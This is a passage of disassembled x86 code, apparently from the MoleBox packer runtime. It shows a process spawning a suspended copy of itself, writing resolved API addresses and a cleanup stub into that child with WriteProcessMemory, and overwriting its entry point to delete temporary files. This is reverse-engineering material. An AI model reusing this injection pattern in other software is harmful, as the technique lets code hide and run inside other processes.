mov ecx, [ebp+var_24]
mov [eax+1], ecx
mov eax, [ebp+var_C8]
add eax, 5
mov [ebp+var_C8], eax
mov eax, [ebp+var_C8]
mov ecx, [ebp+var_3C]
mov [eax+1], ecx
mov eax, [ebp+var_C8]
add eax, 5
mov [ebp+var_C8], eax
mov eax, [ebp+var_C8]
inc eax
mov [ebp+var_C8], eax
mov eax, [ebp+var_C8]
mov dword ptr [eax+1], offset sub_4DABD7
and [ebp+var_C8], 0
xor eax, eax
mov edi, [ebp+var_54]
add edi, 20h
stosd
stosd
stosd
mov eax, [ebp+var_54]
mov dword ptr [eax+24h], 8
mov eax, [ebp+var_A0]
mov dword ptr [eax+0A4h], 8
mov eax, [ebp+var_90]
mov eax, [eax+0Ch]
add eax, 20h
mov ecx, [ebp+var_A0]
mov [ecx+0A0h], eax
mov eax, [ebp+var_A0]
mov ecx, [ebp+var_90]
mov ecx, [ecx+0Ch]
mov [eax+28h], ecx
mov eax, [ebp+var_A0]
mov ax, [eax+6]
add ax, 1
mov ecx, [ebp+var_A0]
mov [ecx+6], ax
mov eax, [ebp+var_A0]
and dword ptr [eax+58h], 0
push 0
push 0
push 2
push 0
push 0
push 40000000h
push [ebp+var_28]
call ds:dword_4E66A8 ;; CreateFileA
mov [ebp+var_58], eax
cmp [ebp+var_58], 0FFFFFFFFh
jnz short loc_4DBE8C
mov ecx, 0EF000011h
call sub_4DD342
loc_4DBE8C: ; CODE XREF: sub_4DB1E1+C9F�j
push 0
lea eax, [ebp+var_CC]
push eax
push [ebp+var_34]
push [ebp+var_1C]
push [ebp+var_58]
call ds:dword_4E67BC ;; WriteFile
cmp [ebp+var_2C], 0
jz short loc_4DBEC2
push 0
lea eax, [ebp+var_CC]
push eax
push [ebp+var_30]
push [ebp+var_2C]
push [ebp+var_58]
call ds:dword_4E67BC ;; WriteFile
loc_4DBEC2: ; CODE XREF: sub_4DB1E1+CC7�j
push 0
lea eax, [ebp+var_CC]
push eax
push 200h
push [ebp+var_54]
push [ebp+var_58]
call ds:dword_4E67BC ;; WriteFile
push [ebp+var_58]
call ds:dword_4E66D8 ;; FlushFileBuffers
push [ebp+var_58]
call ds:dword_4E66A4 ;; CloseHandle
mov ds:dword_4E6958, 1
push [ebp+var_28]
call ds:dword_4E675C ;; LoadLibraryA
mov [ebp+var_D0], eax
cmp [ebp+var_D0], 0
jnz short loc_4DBF2B
push 351h
push offset aDProjectsMy_sr ; "D:\\Projects\\My.SRC\\MoleStudio\\MoleBox\\m"...
call sub_4DD7CA
pop ecx
pop ecx
mov ecx, 0EF000010h
call sub_4DD342
loc_4DBF2B: ; CODE XREF: sub_4DB1E1+D2D�j
movzx eax, [ebp+var_5C]
test eax, eax
jz loc_4DC05C
mov eax, [ebp+var_D0]
mov [ebp+var_DC], eax
mov eax, [ebp+var_DC]
mov ecx, [ebp+var_DC]
add ecx, [eax+3Ch]
mov [ebp+var_EC], ecx
mov eax, [ebp+var_EC]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_EC]
lea eax, [ecx+eax+18h]
mov [ebp+var_E8], eax
mov eax, [ebp+var_EC]
movzx eax, word ptr [eax+6]
imul eax, 28h
mov ecx, [ebp+var_E8]
lea eax, [ecx+eax-28h]
mov [ebp+var_E0], eax
mov eax, [ebp+var_E0]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_DC]
mov eax, [ecx+eax+3Ch]
mov [ebp+var_E4], eax
mov eax, [ebp+var_DC]
add eax, [ebp+var_E4]
mov [ebp+var_D8], eax
push 5Ch
push [ebp+var_24]
call sub_4D1700
pop ecx
pop ecx
mov [ebp+var_D4], eax
cmp [ebp+var_D4], 0
jnz short loc_4DBFE0
mov eax, [ebp+var_24]
mov [ebp+var_D4], eax
jmp short loc_4DBFED
; ---------------------------------------------------------------------------
loc_4DBFE0: ; CODE XREF: sub_4DB1E1+DF2�j
mov eax, [ebp+var_D4]
inc eax
mov [ebp+var_D4], eax
loc_4DBFED: ; CODE XREF: sub_4DB1E1+DFD�j
push 14h
call sub_4DD35A
pop ecx
mov [ebp+var_10C], eax
mov eax, [ebp+var_10C]
mov [ebp+var_F0], eax
mov eax, [ebp+var_F0]
mov ecx, [ebp+var_D4]
mov [eax], ecx
mov eax, [ebp+var_F0]
mov ecx, ds:dword_4E696C
mov [eax+10h], ecx
mov eax, [ebp+var_F0]
mov ecx, [ebp+var_EC]
mov [eax+0Ch], ecx
mov eax, [ebp+var_F0]
mov ecx, [ebp+var_D8]
mov [eax+4], ecx
mov eax, [ebp+var_F0]
mov ecx, [ebp+var_DC]
mov [eax+8], ecx
mov eax, [ebp+var_F0]
mov ds:dword_4E696C, eax
loc_4DC05C: ; CODE XREF: sub_4DB1E1+D50�j
call sub_4DB14D
push 0FFFFFFFFh
mov eax, [ebp+var_D0]
mov [ebp+var_148], eax
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_148]
jmp loc_4DC132
; END OF FUNCTION CHUNK FOR sub_4DB1E1
; =============== S U B R O U T I N E =======================================
sub_4DC085 proc near ; DATA XREF: _5:004E34C8�o
cmp ds:dword_4E6964, 0
jz short loc_4DC096
mov eax, [ebp-44h]
mov ds:dword_4E6964, eax
loc_4DC096: ; CODE XREF: sub_4DC085+7�j
cmp dword ptr [ebp-3Ch], 0FFFFFFFFh
jz short loc_4DC0A6
push 0
push dword ptr [ebp-3Ch]
call sub_4D5741
loc_4DC0A6: ; CODE XREF: sub_4DC085+15�j
mov eax, [ebp-50h]
mov [ebp-110h], eax
push dword ptr [ebp-110h]
call sub_4DD3DD
pop ecx
mov eax, [ebp-4Ch]
mov [ebp-114h], eax
push dword ptr [ebp-114h]
call sub_4DD3DD
pop ecx
mov eax, [ebp-1Ch]
mov [ebp-118h], eax
push dword ptr [ebp-118h]
call sub_4DD3DD
pop ecx
mov eax, [ebp-2Ch]
mov [ebp-11Ch], eax
push dword ptr [ebp-11Ch]
call sub_4DD3DD
pop ecx
mov eax, [ebp-54h]
mov [ebp-120h], eax
push dword ptr [ebp-120h]
call sub_4DD3DD
pop ecx
mov eax, [ebp-28h]
mov [ebp-124h], eax
push dword ptr [ebp-124h]
call sub_4DD3DD
pop ecx
push offset dword_4E6930
call ds:dword_4E6754 ;; RtlLeaveCriticalSection
retn
sub_4DC085 endp
; ---------------------------------------------------------------------------
xor eax, eax
; START OF FUNCTION CHUNK FOR sub_4DB1E1
loc_4DC132: ; CODE XREF: sub_4DB1E1+C3�j
; sub_4DB1E1+145�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_4DB1E1
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DC141 proc near ; CODE XREF: sub_4DFA24+15�p
; _4:004DFAA1�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
push [ebp+arg_0]
mov ecx, ds:dword_4E694C
call sub_4E0871
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4DC1BD
mov edi, [ebp+var_4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_8], ecx
mov eax, [ebp+arg_8]
cmp eax, [ebp+var_8]
jbe short loc_4DC199
mov ecx, [ebp+var_8]
inc ecx
mov esi, [ebp+var_4]
mov edi, [ebp+arg_4]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_8]
mov [eax], ecx
jmp short loc_4DC1B8
; ---------------------------------------------------------------------------
loc_4DC199: ; CODE XREF: sub_4DC141+34�j
mov ecx, [ebp+arg_8]
mov esi, [ebp+var_4]
mov edi, [ebp+arg_4]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+arg_C]
mov ecx, [ebp+arg_8]
mov [eax], ecx
loc_4DC1B8: ; CODE XREF: sub_4DC141+56�j
push 1
pop eax
jmp short loc_4DC1BF
; ---------------------------------------------------------------------------
loc_4DC1BD: ; CODE XREF: sub_4DC141+1C�j
xor eax, eax
loc_4DC1BF: ; CODE XREF: sub_4DC141+7A�j
pop edi
pop esi
leave
retn
sub_4DC141 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DC1C3 proc near ; CODE XREF: sub_4DF0C8+42�p
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = byte ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E34E8
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 80h
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_78], 0
and [ebp+var_74], 0
and [ebp+var_70], 0
xor eax, eax
lea edi, [ebp+var_6C]
stosd
and [ebp+var_60], 0
push 10h
pop ecx
xor eax, eax
lea edi, [ebp+var_5C]
rep stosd
call ds:dword_4E66E4 ;; GetCurrentProcess
mov [ebp+var_68], eax
mov [ebp+var_64], offset dword_4D2720
and [ebp+var_1C], 0
cmp ds:dword_4E6958, 0
jz loc_4DC324
and [ebp+var_4], 0
push 105h
call sub_4DD35A
pop ecx
mov [ebp+var_8C], eax
mov eax, [ebp+var_8C]
mov [ebp+var_78], eax
push 50h
call sub_4DD35A
pop ecx
mov [ebp+var_90], eax
mov eax, [ebp+var_90]
mov [ebp+var_74], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_78]
rep stosd
stosb
push 104h
push [ebp+var_78]
push 0
call ds:dword_4E6718 ;; GetModuleHandleA
push eax
call ds:dword_4E6714 ;; GetModuleFileNameA
mov [ebp+var_60], 44h
lea eax, [ebp+var_88]
push eax
lea eax, [ebp+var_60]
push eax
push 0
push 0
push 4
push 1
push 0
push 0
push 0
push [ebp+var_78]
call ds:dword_4E66B8 ;; CreateProcessA
test eax, eax
jnz short loc_4DC2BD
mov ecx, 0EF000015h
call sub_4DD342
loc_4DC2BD: ; CODE XREF: sub_4DC1C3+EE�j
call ds:dword_4E66E8 ;; GetCurrentProcessId
push eax
push [ebp+var_88]
call sub_4DC494
pop ecx
pop ecx
push [ebp+var_84]
call ds:dword_4E3024 ;; ResumeThread
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4DC324
; ---------------------------------------------------------------------------
mov eax, [ebp+var_14]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_94], eax
cmp [ebp+var_94], 0EF000015h
jnz short loc_4DC308
mov [ebp+var_98], 1
jmp short loc_4DC316
; ---------------------------------------------------------------------------
loc_4DC308: ; CODE XREF: sub_4DC1C3+137�j
push [ebp+var_14]
call sub_4DDC27
mov [ebp+var_98], eax
loc_4DC316: ; CODE XREF: sub_4DC1C3+143�j
mov eax, [ebp+var_98]
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_4DC324: ; CODE XREF: sub_4DC1C3+66�j
; sub_4DC1C3+11E�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4DC1C3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DC333 proc near ; CODE XREF: sub_4DC482+B�p
; DATA XREF: sub_4DC482+6�o ...
var_24C = byte ptr -24Ch
var_220 = byte ptr -220h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
push ebp
mov ebp, esp
sub esp, 24Ch
push edi
and [ebp+var_108], 0
push ds:dword_4E6920
push 0
push 1F0FFFh
call ds:dword_4E6994
mov ds:dword_4E6948, eax
cmp ds:dword_4E6948, 0
jz short loc_4DC3A4
loc_4DC365: ; CODE XREF: sub_4DC333+63�j
lea eax, [ebp+var_108]
push eax
push ds:dword_4E6948
call ds:dword_4E6988
test eax, eax
jz short loc_4DC398
cmp [ebp+var_108], 103h
jnz short loc_4DC398
push 0FFFFFFFFh
push ds:dword_4E6948
call ds:dword_4E698C
jmp short loc_4DC365
; ---------------------------------------------------------------------------
loc_4DC398: ; CODE XREF: sub_4DC333+47�j
; sub_4DC333+53�j
push ds:dword_4E6948
call ds:dword_4E699C
loc_4DC3A4: ; CODE XREF: sub_4DC333+30�j
or [ebp+var_10C], 0FFFFFFFFh
and [ebp+var_104], 0
push 40h
pop ecx
xor eax, eax
lea edi, [ebp+var_103]
rep stosd
stosw
stosb
lea eax, [ebp+var_104]
push eax
push 104h
call ds:dword_4E6970
lea eax, [ebp+var_104]
push eax
call ds:dword_4E6974
lea eax, [ebp+var_104]
push eax
push 104h
call ds:dword_4E6978
push 64h
call ds:dword_4E6998
loc_4DC3FB: ; CODE XREF: sub_4DC333+124�j
lea eax, [ebp+var_24C]
push eax
push offset dword_4E69A0
call ds:dword_4E697C
mov [ebp+var_10C], eax
cmp [ebp+var_10C], 0FFFFFFFFh
jz short loc_4DC459
lea eax, [ebp+var_220]
push eax
call ds:dword_4E6980
test eax, eax
jnz short loc_4DC44B
push 1F4h
call ds:dword_4E6998
lea eax, [ebp+var_220]
push eax
call ds:dword_4E6980
test eax, eax
jnz short loc_4DC44B
jmp short loc_4DC478
; ---------------------------------------------------------------------------
loc_4DC44B: ; CODE XREF: sub_4DC333+F8�j
; sub_4DC333+114�j
push [ebp+var_10C]
call ds:dword_4E6984
jmp short loc_4DC3FB
; ---------------------------------------------------------------------------
loc_4DC459: ; CODE XREF: sub_4DC333+E7�j
; sub_4DC333:loc_4DC478�j
cmp [ebp+var_10C], 0FFFFFFFFh
jz short loc_4DC46E
push [ebp+var_10C]
call ds:dword_4E6984
loc_4DC46E: ; CODE XREF: sub_4DC333+12D�j
push 0
call ds:dword_4E6990
jmp short loc_4DC47A
; ---------------------------------------------------------------------------
loc_4DC478: ; CODE XREF: sub_4DC333+116�j
jmp short loc_4DC459
; ---------------------------------------------------------------------------
loc_4DC47A: ; CODE XREF: sub_4DC333+143�j
pop edi
leave
retn
sub_4DC333 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DC47D proc near ; DATA XREF: sub_4DC494+2B6�o
push ebp
mov ebp, esp
pop ebp
retn
sub_4DC47D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DC482 proc near ; DATA XREF: sub_4DC494+2EF�o
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov eax, offset sub_4DC333
call eax ; sub_4DC333
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4DC482 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DC494 proc near ; CODE XREF: sub_4DC1C3+107�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push esi
push edi
push 0
call ds:dword_4E6718 ;; GetModuleHandleA
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov ecx, [ebp+var_24]
add ecx, [eax+3Ch]
mov [ebp+var_20], ecx
mov eax, [ebp+arg_4]
mov ds:dword_4E6920, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4E6920
push offset dword_4E6920
push [ebp+arg_0]
call ds:dword_4E3028 ;; WriteProcessMemory
push 20h
pop ecx
xor eax, eax
mov edi, offset dword_4E69A0
rep stosd
call ds:dword_4E66E8 ;; GetCurrentProcessId
push eax
push offset aMbx@X@_ ; "MBX@%X@*.###"
push offset dword_4E69A0
call ds:dword_4E67D4 ;; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
push 80h
push offset dword_4E69A0
push offset dword_4E69A0
push [ebp+arg_0]
call ds:dword_4E3028 ;; WriteProcessMemory
mov esi, offset aKernel32_dll ; "kernel32.dll"
lea edi, [ebp+var_10]
movsd
movsd
movsd
movsb
lea eax, [ebp+var_10]
push eax
push offset aGettemppatha ; "GetTempPathA"
call sub_4DED79
pop ecx
pop ecx
mov ds:dword_4E6970, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4E6970
push offset dword_4E6970
push [ebp+arg_0]
call ds:dword_4E3028 ;; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aSetcurrentdire ; "SetCurrentDirectoryA"
call sub_4DED79
pop ecx
pop ecx
mov ds:dword_4E6974, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4E6974
push offset dword_4E6974
push [ebp+arg_0]
call ds:dword_4E3028 ;; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aGetcurrentdire ; "GetCurrentDirectoryA"
call sub_4DED79
pop ecx
pop ecx
mov ds:dword_4E6978, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4E6978
push offset dword_4E6978
push [ebp+arg_0]
call ds:dword_4E3028 ;; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aFindfirstfilea ; "FindFirstFileA"
call sub_4DED79
pop ecx
pop ecx
mov ds:dword_4E697C, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4E697C
push offset dword_4E697C
push [ebp+arg_0]
call ds:dword_4E3028 ;; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aDeletefilea ; "DeleteFileA"
call sub_4DED79
pop ecx
pop ecx
mov ds:dword_4E6980, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4E6980
push offset dword_4E6980
push [ebp+arg_0]
call ds:dword_4E3028 ;; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aFindclose ; "FindClose"
call sub_4DED79
pop ecx
pop ecx
mov ds:dword_4E6984, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4E6984
push offset dword_4E6984
push [ebp+arg_0]
call ds:dword_4E3028 ;; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aGetexitcodepro ; "GetExitCodeProcess"
call sub_4DED79
pop ecx
pop ecx
mov ds:dword_4E6988, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4E6988
push offset dword_4E6988
push [ebp+arg_0]
call ds:dword_4E3028 ;; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aWaitforsingleo ; "WaitForSingleObject"
call sub_4DED79
pop ecx
pop ecx
mov ds:dword_4E698C, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4E698C
push offset dword_4E698C
push [ebp+arg_0]
call ds:dword_4E3028 ;; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aExitprocess ; "ExitProcess"
call sub_4DED79
pop ecx
pop ecx
mov ds:dword_4E6990, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4E6990
push offset dword_4E6990
push [ebp+arg_0]
call ds:dword_4E3028 ;; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aOpenprocess ; "OpenProcess"
call sub_4DED79
pop ecx
pop ecx
mov ds:dword_4E6994, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4E6994
push offset dword_4E6994
push [ebp+arg_0]
call ds:dword_4E3028 ;; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aSleep ; "Sleep"
call sub_4DED79
pop ecx
pop ecx
mov ds:dword_4E6998, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4E6998
push offset dword_4E6998
push [ebp+arg_0]
call ds:dword_4E3028 ;; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aClosehandle ; "CloseHandle"
call sub_4DED79
pop ecx
pop ecx
mov ds:dword_4E699C, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_4E699C
push offset dword_4E699C
push [ebp+arg_0]
call ds:dword_4E3028 ;; WriteProcessMemory
mov eax, offset sub_4DC47D
sub eax, offset sub_4DC333
mov [ebp+var_1C], eax
lea eax, [ebp+var_14]
push eax
push [ebp+var_1C]
push offset sub_4DC333
push offset sub_4DC333
push [ebp+arg_0]
call ds:dword_4E3028 ;; WriteProcessMemory
mov eax, [ebp+var_20]
mov ecx, [ebp+var_24]
add ecx, [eax+28h]
mov [ebp+var_18], ecx
lea eax, [ebp+var_14]
push eax
push 20h
push offset sub_4DC482
push [ebp+var_18]
push [ebp+arg_0]
call ds:dword_4E3028 ;; WriteProcessMemory
pop edi
pop esi
leave
retn
sub_4DC494 endp
; =============== S U B R O U T I N E =======================================
sub_4DC798 proc near ; CODE XREF: _4:004D3ECC�p